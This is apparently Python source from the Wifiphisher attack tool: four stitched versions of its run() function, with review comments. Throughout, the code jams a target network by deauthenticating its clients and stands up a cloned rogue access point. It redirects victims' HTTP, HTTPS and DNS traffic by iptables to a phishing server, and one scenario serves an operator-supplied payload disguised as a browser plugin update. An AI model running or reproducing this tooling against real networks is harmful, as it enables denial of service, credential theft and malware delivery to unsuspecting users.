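def run():
    """Run one full session: set up, serve, show status, then clean up.

    Steps, in order: parse and validate arguments, require root, choose the
    monitor and AP interfaces, apply firewall/routing settings, take the
    network parameters from ``args.essid`` or from a scan, prepare the
    template, start the AP, DHCP and (without an internet interface) the web
    server, then redraw a status screen until interrupted.

    The order matters: each stage changes host network state that
    ``shutdown()`` is later asked to undo.
    """
    print ('[' + T + '*' + W + '] Starting Wifiphisher %s at %s' %
           (VERSION, time.strftime("%Y-%m-%d %H:%M")))

    # Parse args
    global args, APs, clients_APs, mon_MAC, mac_matcher, hop_daemon_running
    args = parse_args()

    # Check args
    check_args(args)

    # Are you root?  A non-zero effective UID is truthy.
    if os.geteuid():
        sys.exit('[' + R + '-' + W + '] Please run as root')

    # TODO: We should have more checks here:
    # Is anything binded to our HTTP(S) ports?
    # Maybe we should save current iptables rules somewhere

    network_manager = interfaces.NetworkManager()
    mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE)
    fw = firewall.Fw()

    # get interfaces for monitor mode and AP mode and set the monitor interface
    # to monitor mode. shutdown on any errors
    try:
        if args.internetinterface:
            internet_interface = network_manager.set_internet_iface(
                args.internetinterface)
        if not args.nojamming:
            if args.jamminginterface and args.apinterface:
                mon_iface = network_manager.get_jam_iface(
                    args.jamminginterface)
                ap_iface = network_manager.get_ap_iface(args.apinterface)
            else:
                mon_iface, ap_iface = \
                    network_manager.find_interface_automatically()
            network_manager.set_jam_iface(mon_iface.get_name())
            network_manager.set_ap_iface(ap_iface.get_name())
            # display selected interfaces to the user
            print ("[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                   "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                   "rogue Access Point").format(G, W, mon_iface.get_name(),
                                                ap_iface.get_name())
        else:
            if args.apinterface:
                ap_iface = network_manager.get_ap_iface(
                    interface_name=args.apinterface)
            else:
                ap_iface = network_manager.get_ap_iface()
            # Without jamming one card does both jobs.
            mon_iface = ap_iface
            network_manager.set_ap_iface(ap_iface.get_name())
            print ("[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                   "rogue Access Point").format(G, W, ap_iface.get_name())

        kill_interfering_procs()
        network_manager.set_interface_mode(mon_iface, "monitor")
    except (interfaces.NotEnoughInterfacesFoundError,
            interfaces.JammingInterfaceInvalidError,
            interfaces.ApInterfaceInvalidError,
            interfaces.NoApInterfaceFoundError,
            interfaces.NoMonitorInterfaceFoundError) as err:
        print ("[{0}!{1}] " + str(err)).format(R, W)
        time.sleep(2)
        # NOTE(review): the code below needs mon_iface/ap_iface, so this
        # presumably relies on shutdown() ending the process - confirm.
        shutdown()

    if args.internetinterface:
        fw.nat(ap_iface.get_name(), args.internetinterface)
        set_ip_fwd()
    else:
        fw.redirect_requests_localhost()
    set_route_localnet()

    if not args.internetinterface:
        network_manager.up_ifaces([ap_iface, mon_iface])

    print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'

    if args.essid:
        # Parameters given by the operator: nothing is scanned, so there is
        # no BSSID or encryption type to report.
        essid = args.essid
        channel = str(CHANNEL)
        args.accesspoint = False
        args.channel = False
        ap_mac = None
        enctype = None
    else:
        # Copy AP
        time.sleep(3)
        hop = Thread(target=channel_hop, args=(mon_iface,))
        hop.daemon = True
        hop.start()
        sniffing(mon_iface.get_name(), targeting_cb)
        channel, essid, ap_mac, enctype = copy_AP()
        args.accesspoint = ap_mac
        args.channel = channel
        # Module-level flag; presumably polled by channel_hop - confirm.
        hop_daemon_running = False

    # get the correct template
    template = select_template(args.phishingscenario)

    print ("[" + G + "+" + W + "] Selecting " + template.get_display_name() +
           " template")

    # payload selection for browser plugin update
    if template.has_payload():
        payload_path = False
        # Prompt until the operator names an existing regular file.
        while not payload_path or not os.path.isfile(payload_path):
            # get payload path
            payload_path = raw_input("[" + G + "+" + W +
                                     "] Enter the [" + G + "full path" + W +
                                     "] to the payload you wish to serve: ")
            if not os.path.isfile(payload_path):
                print '[' + R + '-' + W + '] Invalid file path!'
        print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
        # copy payload to update directory
        copyfile(payload_path, PHISHING_PAGES_DIR +
                 template.get_payload_path())

    # Every field falls back to "" so the template never receives None.
    APs_context = []
    for i in APs:
        APs_context.append({
            'channel': APs[i][0] or "",
            'essid': APs[i][1] or "",
            'bssid': APs[i][2] or "",
            'vendor': mac_matcher.get_vendor_name(APs[i][2]) or ""
        })

    template.merge_context({'APs': APs_context})

    ap_logo_path = template.use_file(mac_matcher.get_vendor_logo_path(ap_mac))

    template.merge_context({
        'target_ap_channel': args.channel or "",
        'target_ap_essid': essid or "",
        'target_ap_bssid': ap_mac or "",
        'target_ap_encryption': enctype or "",
        'target_ap_vendor': mac_matcher.get_vendor_name(ap_mac) or "",
        'target_ap_logo_path': ap_logo_path or ""
    })

    # We want to set this now for hostapd. Maybe the interface was in "monitor"
    # mode for network discovery before (e.g. when --nojamming is enabled).
    network_manager.set_interface_mode(ap_iface, "managed")
    # Start AP
    start_ap(ap_iface.get_name(), channel, essid, args)
    dhcpconf = dhcp_conf(ap_iface.get_name())
    if not dhcp(dhcpconf, ap_iface.get_name()):
        print('[' + G + '+' + W +
              '] Could not set IP address on %s!' % ap_iface.get_name())
        shutdown(template=template)
    # Constant command string: no operator or network input reaches the shell.
    subprocess.call('clear', shell=True)
    print ('[' + T + '*' + W + '] ' + T +
           essid + W + ' set up on channel ' +
           T + channel + W + ' via ' + T + mon_iface.get_name() +
           W + ' on ' + T + str(ap_iface.get_name()) + W)
    # With configured DHCP, we may now start the web server
    if not args.internetinterface:
        # Start HTTP server in a background thread
        print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(PORT) + ", " + str(SSL_PORT)
        webserver = Thread(target=phishinghttp.runHTTPServer,
                           args=(NETWORK_GW_IP, PORT, SSL_PORT, template))
        webserver.daemon = True
        webserver.start()

        time.sleep(1.5)

    # We no longer need mac_matcher
    mac_matcher.unbind()

    clients_APs = []
    APs = []
    monitor_on = None
    conf.iface = mon_iface.get_name()
    mon_MAC = mon_mac(mon_iface.get_name())

    # Bind the name on every path. It used to be assigned only when jamming
    # was enabled, so with args.nojamming the KeyboardInterrupt handler below
    # raised UnboundLocalError before shutdown() ran, and the firewall and
    # interface changes made above were left in place.
    # Assumes shutdown() treats None as "nothing to stop", as its calls with
    # no first argument suggest - TODO confirm.
    deauthentication = None
    if not args.nojamming:
        monchannel = channel
        # set the channel on the deauthenticating interface
        mon_iface.set_channel(int(channel))

        # start deauthenticating all client on target access point
        deauthentication = deauth.Deauthentication(ap_mac,
                                                   mon_iface.get_name())
        deauthentication.deauthenticate()

    # Main loop.
    try:
        term = Terminal()
        with term.fullscreen():
            while 1:
                term.clear()
                with term.hidden_cursor():
                    print term.move(0, term.width - 30) + "|"
                    print term.move(1, term.width - 30) + "|" + " " + term.bold_blue("Wifiphisher " + VERSION)
                    print term.move(2, term.width - 30) + "|" + " ESSID: " + essid
                    print term.move(3, term.width - 30) + "|" + " Channel: " + channel
                    print term.move(4, term.width - 30) + "|" + " AP interface: " + mon_iface.get_name()
                    print term.move(5, term.width - 30) + "|" + "_"*29
                    print term.move(1, 0) + term.blue("Jamming the following clients: ")
                    if not args.nojamming:
                        # only show clients when jamming
                        if deauthentication.get_clients():
                            # show the 5 most recent devices
                            for client in deauthentication.get_clients()[-5:]:
                                print client
                    # NOTE(review): the lease and request-log lines below are
                    # echoed as-is; they presumably hold client-supplied text
                    # (hostnames, request data), so control characters would
                    # reach this terminal unfiltered - confirm and consider
                    # stripping them.
                    print term.move(9,0) + term.blue("DHCP Leases: ")
                    if os.path.isfile('/var/lib/misc/dnsmasq.leases'):
                        proc = check_output(['tail', '-5', '/var/lib/misc/dnsmasq.leases'])
                        print term.move(10,0) + proc
                    print term.move(17,0) + term.blue("HTTP requests: ")
                    if os.path.isfile('/tmp/wifiphisher-webserver.tmp'):
                        proc = check_output(['tail', '-5', '/tmp/wifiphisher-webserver.tmp'])
                        print term.move(18,0) + proc
                    # Reuse the Ctrl-C path so both exits clean up identically.
                    if phishinghttp.terminate and args.quitonsuccess:
                        raise KeyboardInterrupt
    except KeyboardInterrupt:
        shutdown(deauthentication, template, network_manager)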
def run():
    """Set the tool up and create the HTTP server object.

    Steps, in order: parse and validate arguments, require root, run the
    hostapd/dnsmasq/ifconfig helpers, choose the monitor and AP interfaces,
    add NAT redirect rules, scan for and copy an access point, prepare the
    template, start the AP and DHCP, then bind the HTTP server.

    As shown here the function ends once the server object exists or the
    bind has failed.
    """
    print ('[' + T + '*' + W + '] Starting Wifiphisher %s at %s' % \
           (VERSION, time.strftime("%Y-%m-%d %H:%M")))

    # Initialize a list to store the used interfaces
    used_interfaces = list()

    # Parse args
    global args, APs, clients_APs, mon_MAC, mac_matcher, hop_daemon_running
    args = parse_args()

    # Check args
    check_args(args)

    # Are you root?  A non-zero effective UID is truthy.
    if os.geteuid():
        sys.exit('[' + R + '-' + W + '] Please run as root')

    # Get hostapd, dnsmasq or ifconfig if needed
    get_hostapd()
    get_dnsmasq()
    get_ifconfig()

    # TODO: We should have more checks here:
    # Is anything binded to our HTTP(S) ports?
    # Maybe we should save current iptables rules somewhere

    network_manager = interfaces.NetworkManager(args.jamminginterface,
                                                args.apinterface)
    mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE)

    # get interfaces for monitor mode and AP mode and set the monitor interface
    # to monitor mode. shutdown on any errors
    try:
        mon_iface, ap_iface = network_manager.get_interfaces()
        kill_interfering_procs()
        # TODO: this line should be removed once all the wj_iface have been
        # removed
        wj_iface = mon_iface
        # display selected interfaces to the user
        print ("[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "\
               "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "\
               "rogue Access Point").format(G, W, mon_iface, ap_iface)

        # set monitor mode to monitor interface
        network_manager.set_interface_mode(mon_iface, "monitor")
    except (interfaces.NotEnoughInterfacesFoundError,
            interfaces.JammingInterfaceInvalidError,
            interfaces.ApInterfaceInvalidError,
            interfaces.NoApInterfaceFoundError,
            interfaces.NoMonitorInterfaceFoundError) as err:
        print("[{0}!{1}] " + str(err)).format(R, W)
        time.sleep(2)
        # NOTE(review): the code below needs mon_iface/ap_iface, so this
        # presumably relies on shutdown() ending the process - confirm.
        shutdown()

    # add the selected interfaces to the used list
    used_interfaces = [mon_iface, ap_iface]

    # Set iptable rules and kernel variables.
    # The rules are appended to the nat PREROUTING chain and send TCP 80/443
    # and TCP/UDP 53 to NETWORK_GW_IP. The command strings are built from
    # module constants only. os.system() return codes are ignored, so a
    # failed insertion goes unnoticed, and the TODO above notes that the
    # pre-existing rules are not saved first.
    os.system((
        'iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination %s:%s'
        % (NETWORK_GW_IP, PORT)))
    os.system((
        'iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination %s:%s'
        % (NETWORK_GW_IP, 53)))
    os.system((
        'iptables -t nat -A PREROUTING -p tcp --dport 53 -j DNAT --to-destination %s:%s'
        % (NETWORK_GW_IP, 53)))
    os.system((
        'iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination %s:%s'
        % (NETWORK_GW_IP, SSL_PORT)))
    # Started but not waited on: the exit status is never checked and the
    # stderr pipe is never read.
    Popen(['sysctl', '-w', 'net.ipv4.conf.all.route_localnet=1'],
          stdout=DN, stderr=PIPE)

    print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'

    # Copy AP
    time.sleep(3)
    hop = Thread(target=channel_hop, args=(mon_iface, ))
    hop.daemon = True
    hop.start()
    sniffing(mon_iface, targeting_cb)
    channel, essid, ap_mac = copy_AP()
    # Module-level flag; presumably polled by channel_hop - confirm.
    hop_daemon_running = False

    # get the correct template
    template = select_template(args.template)

    print("[" + G + "+" + W + "] Selecting " + template.get_display_name() +
          " template")

    # payload selection for browser plugin update
    # The scenario is recognised by its display name, so renaming the
    # template would silently skip this step.
    if "Browser Plugin Update" in template.get_display_name():
        # get payload path
        payload_path = raw_input("\n[" + G + "+" + W +
                                 "] Enter the [" + G + "full path" + W +
                                 "] to the payload you wish to serve: ")
        # Prompt again until the path names an existing regular file.
        while not os.path.isfile(payload_path):
            print "Invalid file path"
            payload_path = raw_input("\n[" + G + "+" + W +
                                     "] Enter the [" + G + "full path" + W +
                                     "] to the payload you wish to serve: ")
        print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
        # copy payload to update directory
        copyfile(payload_path,
                 PHISHING_PAGES_DIR + '/plugin_update/update/update.exe')

    # One dict per entry in the module-level APs mapping.
    APs_context = []
    for i in APs:
        APs_context.append({
            'channel': APs[i][0],
            'essid': APs[i][1],
            'bssid': APs[i][2],
            'vendor': mac_matcher.get_vendor_name(APs[i][2])
        })

    template.merge_context({'APs': APs_context})

    template.merge_context({
        'target_ap_channel': channel,
        'target_ap_essid': essid,
        'target_ap_bssid': ap_mac,
        'target_ap_vendor': mac_matcher.get_vendor_name(ap_mac)
    })

    phishinghttp.serve_template(template)

    # Start AP
    start_ap(ap_iface, channel, essid, args)
    dhcpconf = dhcp_conf(ap_iface)
    if not dhcp(dhcpconf, ap_iface):
        print('[' + G + '+' + W +
              '] Could not set IP address on %s!' % ap_iface)
        shutdown()
    os.system('clear')
    print('[' + T + '*' + W + '] ' + T +
          essid + W + ' set up on channel ' +
          T + channel + W + ' via ' + T + mon_iface +
          W + ' on ' + T + str(ap_iface) + W)

    # With configured DHCP, we may now start the web server
    # Start HTTP server in a background thread
    Handler = phishinghttp.HTTPRequestHandler
    try:
        httpd = phishinghttp.HTTPServer((NETWORK_GW_IP, PORT), Handler)
    except socket.error, v:
        # v[0] is the socket error number; a bind failure ends the program.
        errno = v[0]
        sys.exit((
            '\n[' + R + '-' + W + '] Unable to start HTTP server (socket errno ' +
            str(errno) + ')!\n' +
            '[' + R + '-' + W + '] Maybe another process is running on port ' +
            str(PORT) + '?\n' +
            '[' + R + '!' + W + '] Closing'))
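def run():
    """Set the tool up and create the HTTP server object.

    Steps, in order: parse and validate arguments, require root, choose the
    monitor and AP interfaces, apply firewall rules and kernel settings,
    take the network parameters from ``args.essid`` or from a scan, prepare
    the template, start the AP and DHCP, then bind the HTTP server.

    As shown here the function ends once the server object exists or the
    bind has failed.
    """
    print ('[' + T + '*' + W + '] Starting Wifiphisher %s at %s' %
           (VERSION, time.strftime("%Y-%m-%d %H:%M")))

    # Parse args
    global args, APs, clients_APs, mon_MAC, mac_matcher, hop_daemon_running
    args = parse_args()

    # Check args
    check_args(args)

    # Are you root?  A non-zero effective UID is truthy.
    if os.geteuid():
        sys.exit('[' + R + '-' + W + '] Please run as root')

    # TODO: We should have more checks here:
    # Is anything binded to our HTTP(S) ports?
    # Maybe we should save current iptables rules somewhere

    network_manager = interfaces.NetworkManager()
    mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE)

    # get interfaces for monitor mode and AP mode and set the monitor interface
    # to monitor mode. shutdown on any errors
    try:
        if not args.nojamming:
            if args.jamminginterface and args.apinterface:
                mon_iface = network_manager.get_jam_iface(
                    args.jamminginterface)
                ap_iface = network_manager.get_ap_iface(args.apinterface)
            else:
                mon_iface, ap_iface = \
                    network_manager.find_interface_automatically()
            network_manager.set_jam_iface(mon_iface.get_name())
            network_manager.set_ap_iface(ap_iface.get_name())
            # display selected interfaces to the user
            print ("[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                   "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                   "rogue Access Point").format(G, W, mon_iface.get_name(),
                                                ap_iface.get_name())
        else:
            ap_iface = network_manager.get_ap_iface()
            # Without jamming one card does both jobs.
            mon_iface = ap_iface
            network_manager.set_ap_iface(ap_iface.get_name())
            print ("[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                   "rogue Access Point").format(G, W, ap_iface.get_name())

        kill_interfering_procs()

        # set monitor mode to monitor interface
        network_manager.set_interface_mode(mon_iface, "monitor")
    except (interfaces.NotEnoughInterfacesFoundError,
            interfaces.JammingInterfaceInvalidError,
            interfaces.ApInterfaceInvalidError,
            interfaces.NoApInterfaceFoundError,
            interfaces.NoMonitorInterfaceFoundError) as err:
        print("[{0}!{1}] " + str(err)).format(R, W)
        time.sleep(2)
        # NOTE(review): the code below needs mon_iface/ap_iface, so this
        # presumably relies on shutdown() ending the process - confirm.
        shutdown()

    set_fw_rules()
    set_kernel_var()
    network_manager.up_ifaces([ap_iface, mon_iface])

    print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'

    if args.essid:
        # Parameters given by the operator: nothing is scanned.
        essid = args.essid
        channel = str(CHANNEL)
        args.accesspoint = False
        args.channel = False
        ap_mac = None
        # enctype is read when the template context is built below. It used
        # to be assigned only on the scan path, so this branch failed there
        # with UnboundLocalError.
        enctype = None
    else:
        # Copy AP
        time.sleep(3)
        hop = Thread(target=channel_hop, args=(mon_iface, ))
        hop.daemon = True
        hop.start()
        sniffing(mon_iface.get_name(), targeting_cb)
        channel, essid, ap_mac, enctype = copy_AP()
        args.accesspoint = ap_mac
        args.channel = channel
        # Module-level flag; presumably polled by channel_hop - confirm.
        hop_daemon_running = False

    # get the correct template
    template = select_template(args.phishingscenario)

    print("[" + G + "+" + W + "] Selecting " + template.get_display_name() +
          " template")

    # payload selection for browser plugin update
    if template.has_payload():
        payload_path = False
        # Prompt until the operator names an existing regular file.
        while not payload_path or not os.path.isfile(payload_path):
            # get payload path
            payload_path = raw_input("[" + G + "+" + W +
                                     "] Enter the [" + G + "full path" + W +
                                     "] to the payload you wish to serve: ")
            if not os.path.isfile(payload_path):
                print '[' + R + '-' + W + '] Invalid file path!'
        print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
        # copy payload to update directory
        copyfile(payload_path, PHISHING_PAGES_DIR +
                 template.get_payload_path())

    # One dict per entry in the module-level APs mapping.
    APs_context = []
    for i in APs:
        APs_context.append({
            'channel': APs[i][0],
            'essid': APs[i][1],
            'bssid': APs[i][2],
            'vendor': mac_matcher.get_vendor_name(APs[i][2])
        })

    template.merge_context({'APs': APs_context})

    ap_logo_path = template.use_file(mac_matcher.get_vendor_logo_path(ap_mac))

    template.merge_context({
        'target_ap_channel': args.channel,
        'target_ap_essid': essid,
        'target_ap_bssid': ap_mac,
        'target_ap_encryption': enctype,
        'target_ap_vendor': mac_matcher.get_vendor_name(ap_mac),
        'target_ap_logo_path': ap_logo_path
    })

    phishinghttp.serve_template(template)

    # We want to set this now for hostapd. Maybe the interface was in "monitor"
    # mode for network discovery before (e.g. when --nojamming is enabled).
    network_manager.set_interface_mode(ap_iface, "managed")

    # Start AP
    start_ap(ap_iface.get_name(), channel, essid, args)
    dhcpconf = dhcp_conf(ap_iface.get_name())
    if not dhcp(dhcpconf, ap_iface.get_name()):
        print('[' + G + '+' + W +
              '] Could not set IP address on %s!' % ap_iface.get_name())
        shutdown(template)
    os.system('clear')
    print('[' + T + '*' + W + '] ' + T +
          essid + W + ' set up on channel ' +
          T + channel + W + ' via ' + T + mon_iface.get_name() +
          W + ' on ' + T + str(ap_iface.get_name()) + W)

    # With configured DHCP, we may now start the web server
    # Start HTTP server in a background thread
    Handler = phishinghttp.HTTPRequestHandler
    try:
        httpd = phishinghttp.HTTPServer((NETWORK_GW_IP, PORT), Handler)
    except socket.error, v:
        # v[0] is the socket error number; a bind failure ends the program.
        errno = v[0]
        sys.exit((
            '\n[' + R + '-' + W + '] Unable to start HTTP server (socket errno ' +
            str(errno) + ')!\n' +
            '[' + R + '-' + W + '] Maybe another process is running on port ' +
            str(PORT) + '?\n' +
            '[' + R + '!' + W + '] Closing'))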
def run():
    """Set the tool up and create the HTTP server object.

    Steps, in order: print the banner, parse and validate arguments, require
    root, run the hostapd/dnsmasq helpers, choose the monitor and AP
    interfaces, add NAT redirect rules, scan for and copy an access point,
    select the template, start the AP and DHCP, then bind the HTTP server.

    As shown here the function ends once the server object exists or the
    bind has failed.
    """
    # NOTE(review): the banner's internal spacing looks collapsed in this
    # listing; the strings are kept exactly as they appear.
    print " _ __ _ _ _ _ "
    print " (_)/ _(_) | | (_) | | "
    print " __ ___| |_ _ _ __ | |__ _ ___| |__ ___ _ __ "
    print " \ \ /\ / / | _| | '_ \| '_ \| / __| '_ \ / _ \ '__|"
    print " \ V V /| | | | | |_) | | | | \__ \ | | | __/ | "
    print " \_/\_/ |_|_| |_| .__/|_| |_|_|___/_| |_|\___|_| "
    print " | | "
    print " |_| "
    print " "

    # Initialize a list to store the used interfaces
    used_interfaces = list()

    # Parse args
    global args, APs, clients_APs, mon_MAC, mac_matcher
    args = parse_args()

    # Check args
    check_args(args)

    # Are you root?  A non-zero effective UID is truthy.
    if os.geteuid():
        sys.exit('[' + R + '-' + W + '] Please run as root')

    # Get hostapd if needed
    get_hostapd()

    # Get dnsmasq if needed
    get_dnsmasq()

    # TODO: We should have more checks here:
    # Is anything binded to our HTTP(S) ports?
    # Maybe we should save current iptables rules somewhere

    network_manager = interfaces.NetworkManager(args.jamminginterface,
                                                args.apinterface)
    mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE)

    # get interfaces for monitor mode and AP mode and set the monitor interface
    # to monitor mode. shutdown on any errors
    try:
        mon_iface, ap_iface = network_manager.get_interfaces()
        # TODO: this line should be removed once all the wj_iface have been
        # removed
        wj_iface = mon_iface
        # display selected interfaces to the user
        print ("\n[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "\
               "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "\
               "rogue access point").format(G, W, mon_iface, ap_iface)

        # set monitor mode to monitor interface
        network_manager.set_interface_mode(mon_iface, "monitor")
    except (interfaces.NotEnoughInterfacesFoundError,
            interfaces.JammingInterfaceInvalidError,
            interfaces.ApInterfaceInvalidError,
            interfaces.NoApInterfaceFoundError,
            interfaces.NoMonitorInterfaceFoundError,
            interfaces.IwCmdError,
            interfaces.IwconfigCmdError,
            interfaces.IfconfigCmdError) as err:
        print("[{0}!{1}] " + str(err)).format(R, W)
        # NOTE(review): the code below needs mon_iface/ap_iface, so this
        # presumably relies on shutdown() ending the process - confirm.
        shutdown()

    # add the selected interfaces to the used list
    used_interfaces = [mon_iface, ap_iface]

    # Set iptable rules and kernel variables.
    # The rules are appended to the nat PREROUTING chain and send TCP 80/443
    # to NETWORK_GW_IP. The command strings are built from module constants
    # only. os.system() return codes are ignored, so a failed insertion goes
    # unnoticed, and the TODO above notes that the pre-existing rules are
    # not saved first.
    os.system((
        'iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination %s:%s'
        % (NETWORK_GW_IP, PORT)))
    os.system((
        'iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination %s:%s'
        % (NETWORK_GW_IP, SSL_PORT)))
    # Started but not waited on: the exit status is never checked and the
    # stderr pipe is never read.
    Popen(['sysctl', '-w', 'net.ipv4.conf.all.route_localnet=1'],
          stdout=DN, stderr=PIPE)

    print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'

    # Copy AP
    time.sleep(3)
    hop = Thread(target=channel_hop, args=(mon_iface, ))
    hop.daemon = True
    hop.start()
    sniffing(mon_iface, targeting_cb)
    channel, essid, ap_mac = copy_AP()
    # NOTE(review): hop_daemon_running is not in the global statement above,
    # so this binds a local that nothing in this function reads. If
    # channel_hop polls a module-level flag of that name, it is never
    # cleared here - confirm.
    hop_daemon_running = False

    # get the correct template
    template = select_template(args.template)

    print("[" + G + "+" + W + "] Selecting " + template.get_display_name() +
          " template")

    # payload selection for browser plugin update
    # The scenario is recognised by its display name, so renaming the
    # template would silently skip this step.
    if "Browser Plugin Update" in template.get_display_name():
        # get payload path
        payload_path = raw_input("\n[" + G + "+" + W +
                                 "] Enter the [" + G + "full path" + W +
                                 "] to the payload you wish to serve: ")
        # Prompt again until the path names an existing regular file.
        while not os.path.isfile(payload_path):
            print "Invalid file path"
            payload_path = raw_input("\n[" + G + "+" + W +
                                     "] Enter the [" + G + "full path" + W +
                                     "] to the payload you wish to serve: ")
        print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
        # copy payload to update directory
        copyfile(payload_path,
                 PHISHING_PAGES_DIR + '/plugin_update/update/update.exe')

    # set the path for the template
    phishinghttp.set_template_path(template.get_path())

    # Kill any possible programs that may interfere with the wireless card
    # Only for systems with airmon-ng installed
    # The existence check uses an absolute path, but the command is launched
    # by bare name and therefore resolved through PATH; it is not waited on.
    if os.path.isfile('/usr/sbin/airmon-ng'):
        proc = Popen(['airmon-ng', 'check', 'kill'], stdout=PIPE, stderr=DN)

    # Start AP
    start_ap(ap_iface, channel, essid, args)
    dhcpconf = dhcp_conf(ap_iface)
    if not dhcp(dhcpconf, ap_iface):
        print('[' + G + '+' + W +
              '] Could not set IP address on %s!' % ap_iface)
        shutdown()
    os.system('clear')
    print('[' + T + '*' + W + '] ' + T +
          essid + W + ' set up on channel ' +
          T + channel + W + ' via ' + T + mon_iface +
          W + ' on ' + T + str(ap_iface) + W)

    # With configured DHCP, we may now start the web server
    # Start HTTP server in a background thread
    Handler = phishinghttp.HTTPRequestHandler
    try:
        httpd = phishinghttp.HTTPServer((NETWORK_GW_IP, PORT), Handler)
    except socket.error, v:
        # v[0] is the socket error number; a bind failure ends the program.
        errno = v[0]
        sys.exit((
            '\n[' + R + '-' + W + '] Unable to start HTTP server (socket errno ' +
            str(errno) + ')!\n' +
            '[' + R + '-' + W + '] Maybe another process is running on port ' +
            str(PORT) + '?\n' +
            '[' + R + '!' + W + '] Closing'))